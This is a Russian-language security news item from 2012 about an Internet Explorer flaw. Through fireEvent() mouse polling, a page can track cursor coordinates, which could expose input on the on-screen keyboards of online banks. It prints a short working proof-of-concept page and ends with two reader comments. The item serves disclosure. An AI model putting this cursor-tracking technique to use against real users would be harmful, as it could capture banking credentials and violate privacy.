15 Декабря, 2012

Виртуальные клавиатуры онлайн-банкингов могут быть скомпрометированы с помощью новой уязвимости в Internet Explorer

Андрей Комаров
Компания Spider.io оповестила компанию Microsoft об уязвимости в IE еще в октябре этого года, тем не менее информация о ней была обнародована в свет только сейчас.

Эксплуатация уязвимости может быть так же использована для отслеживания действий пользователя при авторизации в онлайн-банкинге, где используются виртуальные клавиатуры для защиты от клавиатурных шпионов.



Уязвимость связана с особенностями реализации вызова JS-событий и функции fireEvent(), которая позволяет опрашивать движение курсора. Метод позволяет отслеживать altKey, altLeft, clientX, clientY, ctrlKey, ctrlLeft, offsetX, offsetY, screenX, screenY, shiftKey, shiftLeft, x и y.

POC:
<!DOCTYPE html>  <html>  <head>   <meta charset="utf-8" />    <title>Exploit Demo</title>    <script type="text/javascript">     window.attachEvent("onload", function()   {        var detector = document.getElementById("detector");        detector.attachEvent("onmousemove", function (e)  {          detector.innerHTML = e.screenX + ", " + e.screenY;      });       setInterval(function () {        detector.fireEvent("onmousemove");      }, 100);    });    </script>  </head>  <body>    <div id="detector"> </div>  </body>  </html>  
Видео: http://www.youtube.com/watch?v=qxUa2VWnE8A

Подробнее:
http://spider.io/blog/2012/12/internet-explorer-data-leakage/
http://msdn.microsoft.com/en-us/library/ie/ms536423(v=vs.85).aspx
или введите имя

CAPTCHA
hablbable
15 Декабря, 2012
Так виртуальные клавиатуры в основном используют рендомное расположение цифр.
0 |
16 Декабря, 2012
Увы, далеко не все, включая известные банки и платежные системы: http://www.citibank.com/uae/gcb/cbol/images/utility_bill03.jpg
0 |